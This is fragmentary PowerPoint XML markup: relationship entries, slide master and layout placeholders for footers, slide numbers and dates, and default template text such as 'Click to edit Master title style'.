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 /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml" /><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml" /><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster3.xml" /><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster7.xml" /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml" /><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml" /><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster2.xml" /><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml" /><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml" /><Relationship Id="rId29"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Master" Target="slideMasters/slideMaster6.xml" /><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster11.xml" /><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.xml" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster5.xml" /><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml" /><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12.xml" /><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml" /><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster10.xml" /><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml" /><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster4.xml" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster9.xml" /><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml" /><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml" /><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml" /><Relationship Id="rId3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11"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1816F651-2361-4439-8B1A-CAAC502C7831}"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7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Footer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="28"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{093D9D58-9326-4DE4-B8AE-C1C4F0353977}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="26"/>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0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Footer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="31"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B12D7C2E-A512-4C4F-AC7F-97353C34FA53}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="29"/>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CB38440F-C57C-4C12-A06A-E9CF3EB27A2B}" type="slidenum">
              <a:t>‹#›</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lstStyle/>
          <a:p>
            <a:r>
              <a:t>Footer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E67315DA-25CC-4C66-9445-F3E66E843D73}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="7"/>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42"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4" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Footer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5C7086B1-CA32-447E-8D5D-F5F3134F77F7}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1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6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65"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5" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Footer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E056FEAA-C50F-4999-B0AE-F57DE52DDF23}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="14"/>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18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Footer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C72914D0-CF50-4E74-95FE-016F1B4C7B31}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="17"/>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7"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3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Footer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AD9A20BD-0ACA-46A6-A8EB-41DA1E34F581}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="20"/>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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Footer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{78FB5D6E-6CD0-4918-97C4-F3F92063ED2A}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="2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theme" Target="../theme/theme1.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml" /></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theme" Target="../theme/theme10.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout10.xml" /></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theme" Target="../theme/theme11.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout11.xml" /></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theme" Target="../theme/theme2.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml" /></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theme" Target="../theme/theme3.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml" /></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theme" Target="../theme/theme4.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml" /></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theme" Target="../theme/theme5.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml" /></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theme" Target="../theme/theme6.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml" /></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theme" Target="../theme/theme7.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml" /></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theme" Target="../theme/theme8.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout8.xml" /></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theme" Target="../theme/theme9.xml" /><Relationship Id="rId1"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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446400" y="457200"/>
            <a:ext cx="3702960" cy="946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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8042040" y="453600"/>
            <a:ext cx="3702960" cy="98280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="969FA7"/>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2" name="Rectangle 10"/>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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 7" descr="Logo&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10485000" y="6437880"/>
            <a:ext cx="1125360" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446400" y="3085920"/>
            <a:ext cx="11298600" cy="333792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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="1020600"/>
            <a:ext cx="10993320" cy="1474560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606080" y="6423840"/>
            <a:ext cx="284436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r>
              <a:rPr lang="en-US" sz="900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;date/time&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="900" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="6423840"/>
            <a:ext cx="6916680" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="t">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8" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10558440" y="6423840"/>
            <a:ext cx="105228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fld id="{B7D6448F-2694-41F2-B493-73DED7B36843}" type="slidenum">
              <a:rPr lang="en-US" sz="900" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN" sz="900" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9"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110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit the outline text format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="864000" lvl="1" indent="-324000">
              <a:spcBef>
                <a:spcPts val="1134"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Second Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1296000" lvl="2" indent="-288000">
              <a:spcBef>
                <a:spcPts val="850"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Third Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1728000" lvl="3" indent="-216000">
              <a:spcBef>
                <a:spcPts val="567"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fourth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2160000" lvl="4" indent="-216000">
              <a:spcBef>
                <a:spcPts val="283"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2592000" lvl="5" indent="-216000">
              <a:spcBef>
                <a:spcPts val="283"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="3024000" lvl="6" indent="-216000">
              <a:spcBef>
                <a:spcPts val="283"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solid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 name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446400" y="457200"/>
            <a:ext cx="3702960" cy="946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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8042040" y="453600"/>
            <a:ext cx="3702960" cy="98280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="969FA7"/>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97" name="Rectangle 10"/>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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="98" name="Picture 7" descr="Logo&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10485000" y="6437880"/>
            <a:ext cx="1125360" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447840" y="601200"/>
            <a:ext cx="3682440" cy="58150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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767880" y="933480"/>
            <a:ext cx="3031560" cy="1721880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4901040" y="1179720"/>
            <a:ext cx="6650640" cy="4657680"/>
          </a:xfrm>
